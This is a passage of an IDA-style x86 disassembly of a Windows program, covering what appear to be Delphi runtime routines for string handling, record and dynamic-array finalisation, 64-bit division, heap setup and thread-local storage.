loc_40211E: ; CODE XREF: sub_4020F4+26�j
sub ecx, edi
add edx, esi
lea eax, [edi+edx]
call sub_401264
mov edx, [ebx]
mov eax, ebx
mov edx, [edx-4]
sub edx, edi
call sub_402184
loc_402138: ; CODE XREF: sub_4020F4+12�j
; sub_4020F4+18�j ...
pop edi
pop esi
pop ebx
retn
sub_4020F4 endp
; =============== S U B R O U T I N E =======================================
sub_40213C proc near ; CODE XREF: sub_403168+3D�p
; sub_403168+59�p ...
test eax, eax
jz short locret_402180
test edx, edx
jz short loc_402175
push ebx
push esi
push edi
mov esi, eax
mov edi, edx
mov ecx, [edi-4]
push edi
mov edx, [esi-4]
dec edx
js short loc_402170
mov al, [esi]
inc esi
sub ecx, edx
jle short loc_402170
loc_40215C: ; CODE XREF: sub_40213C+32�j
repne scasb
jnz short loc_402170
mov ebx, ecx
push esi
push edi
mov ecx, edx
repe cmpsb
pop edi
pop esi
jz short loc_402178
mov ecx, ebx
jmp short loc_40215C
; ---------------------------------------------------------------------------
loc_402170: ; CODE XREF: sub_40213C+17�j
; sub_40213C+1E�j ...
pop edx
xor eax, eax
jmp short loc_40217D
; ---------------------------------------------------------------------------
loc_402175: ; CODE XREF: sub_40213C+6�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_402178: ; CODE XREF: sub_40213C+2E�j
pop edx
mov eax, edi
sub eax, edx
loc_40217D: ; CODE XREF: sub_40213C+37�j
pop edi
pop esi
pop ebx
locret_402180: ; CODE XREF: sub_40213C+2�j
retn
sub_40213C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402184 proc near ; CODE XREF: sub_4012C4+7F�p
; sub_401F0C+21�p ...
push ebx
push esi
push edi
mov ebx, eax
mov esi, edx
xor edi, edi
test edx, edx
jle short loc_4021D9
mov eax, [ebx]
test eax, eax
jz short loc_4021BA
cmp dword ptr [eax-8], 1
jnz short loc_4021BA
sub eax, 8
add edx, 9
push eax
mov eax, esp
call sub_401174
pop eax
add eax, 8
mov [ebx], eax
mov [eax-4], esi
mov byte ptr [esi+eax], 0
jmp short loc_4021E2
; ---------------------------------------------------------------------------
loc_4021BA: ; CODE XREF: sub_402184+11�j
; sub_402184+17�j
mov eax, edx
call sub_401E84
mov edi, eax
mov eax, [ebx]
test eax, eax
jz short loc_4021D9
mov edx, edi
mov ecx, [eax-4]
cmp ecx, esi
jl short loc_4021D4
mov ecx, esi
loc_4021D4: ; CODE XREF: sub_402184+4C�j
call sub_401264
loc_4021D9: ; CODE XREF: sub_402184+B�j
; sub_402184+43�j
mov eax, ebx
call sub_401DC4
mov [ebx], edi
loc_4021E2: ; CODE XREF: sub_402184+34�j
pop edi
pop esi
pop ebx
retn
sub_402184 endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_402208
loc_4021E8: ; CODE XREF: sub_402208+1D�j
mov al, 1
jmp sub_40121C
; END OF FUNCTION CHUNK FOR sub_402208
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_402208
loc_4021F0: ; CODE XREF: sub_402208+2�j
; sub_402208+D�j
mov edx, [eax]
test edx, edx
jz short locret_402204
mov dword ptr [eax], 0
push eax
push edx ; bstrString
call SysFreeString
pop eax
locret_402204: ; CODE XREF: sub_402208-14�j
retn
; END OF FUNCTION CHUNK FOR sub_402208
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402208 proc near ; CODE XREF: sub_402350+81�p
; sub_40246C+61�p
; FUNCTION CHUNK AT 004021E8 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004021F0 SIZE 00000015 BYTES
test edx, edx
jz loc_4021F0
mov ecx, [edx-4]
shr ecx, 1
jz loc_4021F0
push ecx ; len
push edx ; psz
push eax ; pbstr
call SysReAllocStringLen
test eax, eax
jz loc_4021E8
retn
sub_402208 endp
; =============== S U B R O U T I N E =======================================
sub_40222C proc near ; CODE XREF: sub_402260+B1�p
xor ecx, ecx
push ebx
mov cl, [edx+1]
push esi
push edi
mov ebx, eax
lea esi, [ecx+edx+0Ah]
mov edi, [ecx+edx+6]
loc_40223E: ; CODE XREF: sub_40222C+29�j
mov edx, [esi]
mov eax, [esi+4]
add eax, ebx
mov edx, [edx]
mov ecx, 1
call sub_402260
add esi, 8
dec edi
jg short loc_40223E
mov eax, ebx
pop edi
pop esi
pop ebx
retn
sub_40222C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402260 proc near ; CODE XREF: sub_40222C+20�p
; sub_402260+9B�p ...
cmp ecx, 0
jz locret_40234B
push eax
push ebx
push esi
push edi
mov ebx, eax
mov esi, edx
mov edi, ecx
xor edx, edx
mov al, [esi]
mov dl, [esi+1]
cmp al, 0Ah
jz short loc_4022A3
cmp al, 0Bh
jz short loc_4022C0
cmp al, 0Ch
jz short loc_4022D9
cmp al, 0Dh
jz short loc_4022E8
cmp al, 0Eh
jz short loc_402306
cmp al, 0Fh
jz loc_40231C
cmp al, 11h
jz loc_40232B
jmp loc_40233C
; ---------------------------------------------------------------------------
loc_4022A3: ; CODE XREF: sub_402260+1C�j
cmp ecx, 1
mov eax, ebx
jg short loc_4022B4
call sub_401DC4
jmp loc_402347
; ---------------------------------------------------------------------------
loc_4022B4: ; CODE XREF: sub_402260+48�j
mov edx, ecx
call sub_401DE8
jmp loc_402347
; ---------------------------------------------------------------------------
loc_4022C0: ; CODE XREF: sub_402260+20�j
cmp ecx, 1
mov eax, ebx
jg short loc_4022CF
call ds:off_405024
jmp short loc_402347
; ---------------------------------------------------------------------------
loc_4022CF: ; CODE XREF: sub_402260+65�j
mov edx, ecx
call ds:off_405028
jmp short loc_402347
; ---------------------------------------------------------------------------
loc_4022D9: ; CODE XREF: sub_402260+24�j
; sub_402260+84�j
mov eax, ebx
add ebx, 10h
call sub_4025B0
dec edi
jg short loc_4022D9
jmp short loc_402347
; ---------------------------------------------------------------------------
loc_4022E8: ; CODE XREF: sub_402260+28�j
push ebp
mov ebp, edx
loc_4022EB: ; CODE XREF: sub_402260+A1�j
mov edx, [esi+ebp+0Ah]
mov eax, ebx
add ebx, [esi+ebp+2]
mov ecx, [esi+ebp+6]
mov edx, [edx]
call sub_402260
dec edi
jg short loc_4022EB
pop ebp
jmp short loc_402347
; ---------------------------------------------------------------------------
loc_402306: ; CODE XREF: sub_402260+2C�j
push ebp
mov ebp, edx
loc_402309: ; CODE XREF: sub_402260+B7�j
mov eax, ebx
add ebx, [esi+ebp+2]
mov edx, esi
call sub_40222C
dec edi
jg short loc_402309
pop ebp
jmp short loc_402347
; ---------------------------------------------------------------------------
loc_40231C: ; CODE XREF: sub_402260+30�j
; sub_402260+C7�j
mov eax, ebx
add ebx, 4
call sub_402888
dec edi
jg short loc_40231C
jmp short loc_402347
; ---------------------------------------------------------------------------
loc_40232B: ; CODE XREF: sub_402260+38�j
; sub_402260+D8�j
mov eax, ebx
mov edx, esi
add ebx, 4
call sub_4027F4
dec edi
jg short loc_40232B
jmp short loc_402347
; ---------------------------------------------------------------------------
loc_40233C: ; CODE XREF: sub_402260+3E�j
pop edi
pop esi
pop ebx
pop eax
mov al, 2
jmp sub_40121C
; ---------------------------------------------------------------------------
loc_402347: ; CODE XREF: sub_402260+4F�j
; sub_402260+5B�j ...
pop edi
pop esi
pop ebx
pop eax
locret_40234B: ; CODE XREF: sub_402260+3�j
retn
sub_402260 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
sub_402350 proc near ; CODE XREF: sub_402350+CF�p
; sub_40246C+AC�p
push ebx
push esi
push edi
push ebp
mov ebx, eax
mov esi, edx
xor eax, eax
mov al, [ecx+1]
lea edi, [eax+ecx+0Ah]
mov ebp, [edi-4]
xor eax, eax
mov ecx, [edi-8]
push ecx
loc_40236A: ; CODE XREF: sub_402350+100�j
mov ecx, [edi+4]
sub ecx, eax
jle short loc_40237C
mov edx, eax
add eax, esi
add edx, ebx
call sub_401264
loc_40237C: ; CODE XREF: sub_402350+1F�j
mov eax, [edi+4]
mov edx, [edi]
mov edx, [edx]
mov cl, [edx]
cmp cl, 0Ah
jz short loc_4023BB
cmp cl, 0Bh
jz short loc_4023CC
cmp cl, 0Ch
jz short loc_4023DD
cmp cl, 0Dh
jz short loc_4023EE
cmp cl, 0Eh
jz short loc_40240E
cmp cl, 0Fh
jz loc_402427
cmp cl, 11h
jz loc_402438
mov al, 2
pop ebp
pop edi
pop esi
pop ebx
jmp sub_40121C
; ---------------------------------------------------------------------------
loc_4023BB: ; CODE XREF: sub_402350+38�j
mov edx, [eax+esi]
add eax, ebx
call sub_401E18
mov eax, 4
jmp short loc_402449
; ---------------------------------------------------------------------------
loc_4023CC: ; CODE XREF: sub_402350+3D�j
mov edx, [eax+esi]
add eax, ebx
call sub_402208
mov eax, 4
jmp short loc_402449
; ---------------------------------------------------------------------------
loc_4023DD: ; CODE XREF: sub_402350+42�j
lea edx, [eax+esi]
add eax, ebx
call sub_4025A8
mov eax, 10h
jmp short loc_402449
; ---------------------------------------------------------------------------
loc_4023EE: ; CODE XREF: sub_402350+47�j
xor ecx, ecx
mov cl, [edx+1]
push dword ptr [ecx+edx+2]
push dword ptr [ecx+edx+6]
mov ecx, [ecx+edx+0Ah]
mov ecx, [ecx]
lea edx, [eax+esi]
add eax, ebx
call sub_40246C
pop eax
jmp short loc_402449
; ---------------------------------------------------------------------------
loc_40240E: ; CODE XREF: sub_402350+4C�j
xor ecx, ecx
mov cl, [edx+1]
mov ecx, [ecx+edx+2]
push ecx
mov ecx, edx
lea edx, [eax+esi]
add eax, ebx
call sub_402350
pop eax
jmp short loc_402449
; ---------------------------------------------------------------------------
loc_402427: ; CODE XREF: sub_402350+51�j
mov edx, [eax+esi]
add eax, ebx
call sub_4028A0
mov eax, 4
jmp short loc_402449
; ---------------------------------------------------------------------------
loc_402438: ; CODE XREF: sub_402350+5A�j
mov ecx, edx
mov edx, [eax+esi]
add eax, ebx
call sub_402830
mov eax, 4
loc_402449: ; CODE XREF: sub_402350+7A�j
; sub_402350+8B�j ...
add eax, [edi+4]
add edi, 8
dec ebp
jnz loc_40236A
pop ecx
sub ecx, eax
jle short loc_402465
lea edx, [eax+ebx]
add eax, esi
call sub_401264
loc_402465: ; CODE XREF: sub_402350+109�j
pop ebp
pop edi
pop esi
pop ebx
retn
sub_402350 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40246C proc near ; CODE XREF: sub_402350+B6�p
; sub_40246C+98�p ...
arg_0 = dword ptr 4
push ebx
push esi
push edi
push ebp
mov ebx, eax
mov esi, edx
mov edi, ecx
mov ebp, [esp+10h+arg_0]
mov cl, [edi]
cmp cl, 0Ah
jz short loc_4024B2
cmp cl, 0Bh
jz short loc_4024C9
cmp cl, 0Ch
jz short loc_4024DD
cmp cl, 0Dh
jz short loc_4024F1
cmp cl, 0Eh
jz short loc_402512
cmp cl, 0Fh
jz loc_40252F
cmp cl, 11h
jz loc_402543
mov al, 2
pop ebp
pop edi
pop esi
pop ebx
jmp sub_40121C
; ---------------------------------------------------------------------------
loc_4024B2: ; CODE XREF: sub_40246C+13�j
; sub_40246C+56�j
mov eax, ebx
mov edx, [esi]
call sub_401E18
add ebx, 4
add esi, 4
dec ebp
jnz short loc_4024B2
jmp loc_402557
; ---------------------------------------------------------------------------
loc_4024C9: ; CODE XREF: sub_40246C+18�j
; sub_40246C+6D�j
mov eax, ebx
mov edx, [esi]
call sub_402208
add ebx, 4
add esi, 4
dec ebp
jnz short loc_4024C9
jmp short loc_402557
; ---------------------------------------------------------------------------
loc_4024DD: ; CODE XREF: sub_40246C+1D�j
; sub_40246C+81�j
mov eax, ebx
mov edx, esi
call sub_4025A8
add ebx, 10h
add esi, 10h
dec ebp
jnz short loc_4024DD
jmp short loc_402557
; ---------------------------------------------------------------------------
loc_4024F1: ; CODE XREF: sub_40246C+22�j
xor ecx, ecx
mov cl, [edi+1]
lea edi, [ecx+edi+2]
loc_4024FA: ; CODE XREF: sub_40246C+A2�j
mov eax, ebx
mov edx, esi
mov ecx, [edi+8]
push dword ptr [edi+4]
call sub_40246C
add ebx, [edi]
add esi, [edi]
dec ebp
jnz short loc_4024FA
jmp short loc_402557
; ---------------------------------------------------------------------------
loc_402512: ; CODE XREF: sub_40246C+27�j
; sub_40246C+BF�j
mov eax, ebx
mov edx, esi
mov ecx, edi
call sub_402350
xor eax, eax
mov al, [edi+1]
add ebx, [eax+edi+2]
add esi, [eax+edi+2]
dec ebp
jnz short loc_402512
jmp short loc_402557
; ---------------------------------------------------------------------------
loc_40252F: ; CODE XREF: sub_40246C+2C�j
; sub_40246C+D3�j
mov eax, ebx
mov edx, [esi]
call sub_4028A0
add ebx, 4
add esi, 4
dec ebp
jnz short loc_40252F
jmp short loc_402557
; ---------------------------------------------------------------------------
loc_402543: ; CODE XREF: sub_40246C+35�j
; sub_40246C+E9�j
mov eax, ebx
mov edx, [esi]
mov ecx, edi
call sub_402830
add ebx, 4
add esi, 4
dec ebp
jnz short loc_402543
loc_402557: ; CODE XREF: sub_40246C+58�j
; sub_40246C+6F�j ...
pop ebp
pop edi
pop esi
pop ebx
retn 4
sub_40246C endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_402560 proc near ; CODE XREF: CODE:00402577�p
; DATA XREF: sub_402580:loc_402587�o
mov al, 10h
jmp sub_40121C
sub_402560 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
loc_402568: ; DATA XREF: sub_402580+14�o
mov ax, [eax]
sub ax, 2
jb short locret_40257C
sub ax, 8
jz short locret_40257C
call sub_402560
; ---------------------------------------------------------------------------
locret_40257C: ; CODE XREF: CODE:0040256F�j
; CODE:00402575�j
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402580 proc near ; CODE XREF: sub_402914+1D�p
mov edx, offset dword_4063F4
xor eax, eax
loc_402587: ; CODE XREF: sub_402580+12�j
mov dword ptr [edx+eax*4], offset sub_402560
inc eax
cmp eax, 2Bh
jnz short loc_402587
mov eax, offset loc_402568
mov ds:dword_4063F4, eax
retn
sub_402580 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4025A0 proc near ; CODE XREF: sub_4025B0+1�p
jmp ds:dword_4063F4
sub_4025A0 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4025A8 proc near ; CODE XREF: sub_402350+92�p
; sub_40246C+75�p
jmp ds:dword_4063F8
sub_4025A8 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4025B0 proc near ; CODE XREF: sub_402260+7E�p
push eax
call sub_4025A0
pop eax
retn
sub_4025B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_4025B8 proc near ; DATA XREF: sub_402914+13�o
mov al, 11h
jmp sub_40121C
sub_4025B8 endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_4025C0 proc near ; CODE XREF: sub_403900+65�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebp
push ebx
push esi
push edi
xor edi, edi
mov ebx, [esp+10h+arg_0]
mov ecx, [esp+10h+arg_4]
or ecx, ecx
jnz short loc_4025DA
or edx, edx
jz short loc_402632
or ebx, ebx
jz short loc_402632
loc_4025DA: ; CODE XREF: sub_4025C0+10�j
or edx, edx
jns short loc_4025E8
neg edx
neg eax
sbb edx, 0
or edi, 1
loc_4025E8: ; CODE XREF: sub_4025C0+1C�j
or ecx, ecx
jns short loc_4025F6
neg ecx
neg ebx
sbb ecx, 0
xor edi, 1
loc_4025F6: ; CODE XREF: sub_4025C0+2A�j
mov ebp, ecx
mov ecx, 40h
push edi
xor edi, edi
xor esi, esi
loc_402602: ; CODE XREF: sub_4025C0:loc_402619�j
shl eax, 1
rcl edx, 1
rcl esi, 1
rcl edi, 1
cmp edi, ebp
jb short loc_402619
ja short loc_402614
cmp esi, ebx
jb short loc_402619
loc_402614: ; CODE XREF: sub_4025C0+4E�j
sub esi, ebx
sbb edi, ebp
inc eax
loc_402619: ; CODE XREF: sub_4025C0+4C�j
; sub_4025C0+52�j
loop loc_402602
pop ebx
test ebx, 1
jz short loc_40262B
neg edx
neg eax
sbb edx, 0
loc_40262B: ; CODE XREF: sub_4025C0+62�j
; sub_4025C0+76�j
pop edi
pop esi
pop ebx
pop ebp
retn 8
; ---------------------------------------------------------------------------
loc_402632: ; CODE XREF: sub_4025C0+14�j
; sub_4025C0+18�j
div ebx
xor edx, edx
jmp short loc_40262B
sub_4025C0 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40263C proc near ; CODE XREF: sub_40265C+106�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push [ebp+arg_0]
call sub_40246C
pop ebp
retn 4
sub_40263C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40264C proc near ; CODE XREF: sub_40265C+B0�p
jmp sub_402260
sub_40264C endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402654 proc near ; CODE XREF: sub_40265C+2F�p
call sub_4027F4
retn
sub_402654 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40265C proc near ; CODE XREF: sub_40265C+173�p
; sub_4027E8+5�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFE0h
push ebx
push esi
push edi
mov [ebp+var_8], ecx
mov esi, edx
mov [ebp+var_4], eax
mov ebx, [ebp+var_4]
mov ebx, [ebx]
mov eax, [ebp+arg_0]
mov edi, [eax]
test edi, edi
jg short loc_402695
test edi, edi
jge short loc_402686
mov al, 4
call sub_40121C
; ---------------------------------------------------------------------------
loc_402686: ; CODE XREF: sub_40265C+21�j
mov eax, [ebp+var_4]
mov edx, esi
call sub_402654
jmp loc_4027DF
; ---------------------------------------------------------------------------
loc_402695: ; CODE XREF: sub_40265C+1D�j
xor eax, eax
mov [ebp+var_10], eax
test ebx, ebx
jz short loc_4026A9
sub ebx, 4
mov eax, [ebx]
mov [ebp+var_10], eax
sub ebx, 4
loc_4026A9: ; CODE XREF: sub_40265C+40�j
xor eax, eax
mov al, [esi+1]
add esi, eax
mov eax, esi
mov edx, [eax+2]
mov [ebp+var_18], edx
mov edx, [eax+6]
test edx, edx
jz short loc_4026C3
mov esi, [edx]
jmp short loc_4026C5
; ---------------------------------------------------------------------------
loc_4026C3: ; CODE XREF: sub_40265C+61�j
xor esi, esi
loc_4026C5: ; CODE XREF: sub_40265C+65�j
mov eax, edi
imul [ebp+var_18]
mov [ebp+var_1C], eax
mov eax, [ebp+var_1C]
cdq
idiv edi
cmp eax, [ebp+var_18]
jz short loc_4026DF
mov al, 4
call sub_40121C
; ---------------------------------------------------------------------------
loc_4026DF: ; CODE XREF: sub_40265C+7A�j
add [ebp+var_1C], 8
test ebx, ebx
jz short loc_4026EC
cmp dword ptr [ebx], 1
jnz short loc_402721
loc_4026EC: ; CODE XREF: sub_40265C+89�j
mov [ebp+var_20], ebx
cmp edi, [ebp+var_10]
jge short loc_402711
test esi, esi
jz short loc_402711
mov eax, ebx
add eax, 8
mov edx, edi
imul edx, [ebp+var_18]
add eax, edx
mov ecx, [ebp+var_10]
sub ecx, edi
mov edx, esi
call sub_40264C
loc_402711: ; CODE XREF: sub_40265C+96�j
; sub_40265C+9A�j
lea eax, [ebp+var_20]
mov edx, [ebp+var_1C]
call sub_401174
mov ebx, [ebp+var_20]
jmp short loc_40277F
; ---------------------------------------------------------------------------
loc_402721: ; CODE XREF: sub_40265C+8E�j
dec dword ptr [ebx]
mov eax, [ebp+var_1C]
call sub_401144
mov ebx, eax
mov eax, [ebp+var_10]
mov [ebp+var_14], eax
cmp edi, [ebp+var_14]
jge short loc_40273B
mov [ebp+var_14], edi
loc_40273B: ; CODE XREF: sub_40265C+DA�j
test esi, esi
jz short loc_402769
mov edx, [ebp+var_14]
imul edx, [ebp+var_18]
mov eax, ebx
add eax, 8
xor ecx, ecx
call sub_4018A8
mov eax, [ebp+var_14]
push eax
mov edx, [ebp+var_4]
mov edx, [edx]
mov eax, ebx
add eax, 8
mov ecx, esi
call sub_40263C
jmp short loc_40277F
; ---------------------------------------------------------------------------
loc_402769: ; CODE XREF: sub_40265C+E1�j
mov ecx, [ebp+var_14]
imul ecx, [ebp+var_18]
mov edx, ebx
add edx, 8
mov eax, [ebp+var_4]
mov eax, [eax]
call sub_401264
loc_40277F: ; CODE XREF: sub_40265C+C3�j
; sub_40265C+10B�j
mov dword ptr [ebx], 1
add ebx, 4
mov [ebx], edi
add ebx, 4
mov edx, edi
sub edx, [ebp+var_10]
imul edx, [ebp+var_18]
mov eax, [ebp+var_18]
imul eax, [ebp+var_10]
add eax, ebx
xor ecx, ecx
call sub_4018A8
cmp [ebp+var_8], 1
jle short loc_4027DA
add [ebp+arg_0], 4
dec [ebp+var_8]
dec edi
test edi, edi
jl short loc_4027DA
inc edi
mov [ebp+var_C], 0
loc_4027C0: ; CODE XREF: sub_40265C+17C�j
mov eax, [ebp+arg_0]
push eax
mov eax, [ebp+var_C]
lea eax, [ebx+eax*4]
mov ecx, [ebp+var_8]
mov edx, esi
call sub_40265C
inc [ebp+var_C]
dec edi
jnz short loc_4027C0
loc_4027DA: ; CODE XREF: sub_40265C+14E�j
; sub_40265C+15A�j
mov eax, [ebp+var_4]
mov [eax], ebx
loc_4027DF: ; CODE XREF: sub_40265C+34�j
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
sub_40265C endp
; =============== S U B R O U T I N E =======================================
sub_4027E8 proc near ; CODE XREF: sub_403168+81�p
; sub_403168+132�p
var_4 = dword ptr -4
push esp
add [esp+4+var_4], 4
call sub_40265C
retn
sub_4027E8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4027F4 proc near ; CODE XREF: sub_402260+D2�p
; sub_402654�p ...
mov ecx, [eax]
test ecx, ecx
jz short locret_40282C
mov dword ptr [eax], 0
dec dword ptr [ecx-8]
jnz short locret_40282C
push eax
mov eax, ecx
xor ecx, ecx
mov cl, [edx+1]
mov edx, [ecx+edx+6]
test edx, edx
jz short loc_402823
mov ecx, [eax-4]
test ecx, ecx
jz short loc_402823
mov edx, [edx]
call sub_402260
loc_402823: ; CODE XREF: sub_4027F4+1F�j
; sub_4027F4+26�j
sub eax, 8
call sub_40115C
pop eax
locret_40282C: ; CODE XREF: sub_4027F4+4�j
; sub_4027F4+F�j
retn
sub_4027F4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402830 proc near ; CODE XREF: sub_402350+EF�p
; sub_40246C+DD�p
push ebx
mov ebx, [eax]
test edx, edx
jz short loc_40283A
inc dword ptr [edx-8]
loc_40283A: ; CODE XREF: sub_402830+5�j
test ebx, ebx
jz short loc_402851
dec dword ptr [ebx-8]
jnz short loc_402851
push eax
push edx
mov edx, ecx
inc dword ptr [ebx-8]
call sub_4027F4
pop edx
pop eax
loc_402851: ; CODE XREF: sub_402830+C�j
; sub_402830+11�j
mov [eax], edx
pop ebx
retn
sub_402830 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402858 proc near ; CODE XREF: sub_4029DC+5�p
mov edx, ds:dword_405018
mov [eax], edx
mov ds:dword_405018, eax
retn
sub_402858 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402868 proc near ; CODE XREF: sub_401CDC+66�p
; DATA XREF: DATA:off_405020�o
push ebx
push esi
mov esi, eax
mov ebx, ds:dword_40501C
test ebx, ebx
jz short loc_402882
loc_402876: ; CODE XREF: sub_402868+18�j
mov eax, [esi+4]
call dword ptr [ebx+4]
mov ebx, [ebx]
test ebx, ebx
jnz short loc_402876
loc_402882: ; CODE XREF: sub_402868+C�j
pop esi
pop ebx
retn
sub_402868 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402888 proc near ; CODE XREF: sub_402260+C1�p
mov edx, [eax]
test edx, edx
jz short locret_40289C
mov dword ptr [eax], 0
push eax
push edx
mov eax, [edx]
call dword ptr [eax+8]
pop eax
locret_40289C: ; CODE XREF: sub_402888+4�j
retn
sub_402888 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4028A0 proc near ; CODE XREF: sub_402350+DC�p
; sub_40246C+C7�p
test edx, edx
jz short loc_4028BD
push edx
push eax
mov eax, [edx]
push edx
call dword ptr [eax+4]
pop eax
mov ecx, [eax]
pop dword ptr [eax]
test ecx, ecx
jnz short loc_4028B6
retn
; ---------------------------------------------------------------------------
loc_4028B6: ; CODE XREF: sub_4028A0+13�j
mov eax, [ecx]
push ecx
call dword ptr [eax+8]
retn
; ---------------------------------------------------------------------------
loc_4028BD: ; CODE XREF: sub_4028A0+2�j
mov ecx, [eax]
test ecx, ecx
mov [eax], edx
jz short locret_4028CB
mov eax, [ecx]
push ecx
call dword ptr [eax+8]
locret_4028CB: ; CODE XREF: sub_4028A0+23�j
retn
sub_4028A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4028CC proc near ; DATA XREF: CODE:00403F78�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_402908
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_4063BC
jnz short loc_4028FA
cmp ds:dword_4063F0, 0
jz short loc_4028F4
call ds:dword_4063F0
loc_4028F4: ; CODE XREF: sub_4028CC+20�j
call ds:off_405038
loc_4028FA: ; CODE XREF: sub_4028CC+17�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40290F
loc_402907: ; CODE XREF: sub_4028CC+41�j
retn
; ---------------------------------------------------------------------------
loc_402908: ; DATA XREF: sub_4028CC+6�o
jmp loc_401B94
; ---------------------------------------------------------------------------
jmp short loc_402907
; ---------------------------------------------------------------------------
loc_40290F: ; CODE XREF: sub_4028CC:loc_402907�j
; DATA XREF: sub_4028CC+36�o
pop ebp
retn
sub_4028CC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402914 proc near ; DATA XREF: CODE:00403F74�o
sub ds:dword_4063BC, 1
jnb short locret_402940
call GetProcessHeap
mov ds:hHeap, eax
mov ds:dword_406000, offset sub_4025B8
call sub_402580
call GetCurrentThreadId
mov ds:dword_406018, eax
locret_402940: ; CODE XREF: sub_402914+7�j
retn
sub_402914 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402944 proc near ; CODE XREF: sub_402958+21�p
push eax ; uBytes
push 40h ; uFlags
call LocalAlloc
retn
sub_402944 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402950 proc near ; CODE XREF: sub_402958+1�p
mov eax, 4
retn
sub_402950 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402958 proc near ; CODE XREF: sub_40299C:loc_4029B6�p
push ebx
call sub_402950
mov ebx, eax
test ebx, ebx
jz short loc_40299A
cmp ds:TlsIndex, 0FFFFFFFFh
jnz short loc_402977
mov eax, 0E2h
call sub_401DB8
; ---------------------------------------------------------------------------
loc_402977: ; CODE XREF: sub_402958+13�j
mov eax, ebx
call sub_402944
test eax, eax
jnz short loc_40298E
mov eax, 0E2h
call sub_401DB8
; ---------------------------------------------------------------------------
jmp short loc_40299A
; ---------------------------------------------------------------------------
loc_40298E: ; CODE XREF: sub_402958+28�j
push eax ; lpTlsValue
mov eax, ds:TlsIndex
push eax ; dwTlsIndex
call TlsSetValue
loc_40299A: ; CODE XREF: sub_402958+A�j
; sub_402958+34�j
pop ebx
retn
sub_402958 endp
; =============== S U B R O U T I N E =======================================
sub_40299C proc near ; CODE XREF: sub_4011D0+20�p
; sub_401228+3�p ...
mov cl, ds:byte_4064A0
mov eax, ds:TlsIndex
test cl, cl
jnz short loc_4029D1
mov edx, large fs:2Ch
mov eax, [edx+eax*4]
retn
; ---------------------------------------------------------------------------
loc_4029B6: ; CODE XREF: sub_40299C+3D�j
call sub_402958
mov eax, ds:TlsIndex
push eax ; dwTlsIndex
call TlsGetValue
test eax, eax
jz short loc_4029CB
retn
; ---------------------------------------------------------------------------
loc_4029CB: ; CODE XREF: sub_40299C+2C�j
mov eax, ds:dword_4064B4
retn
; ---------------------------------------------------------------------------
loc_4029D1: ; CODE XREF: sub_40299C+D�j
push eax ; dwTlsIndex
call TlsGetValue
test eax, eax
jz short loc_4029B6
retn
sub_40299C endp
; =============== S U B R O U T I N E =======================================
sub_4029DC proc near ; CODE XREF: sub_4029E8+2E�p
mov eax, offset dword_40508C
call sub_402858
retn
sub_4029DC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4029E8 proc near ; CODE XREF: CODE:00403FE3�p
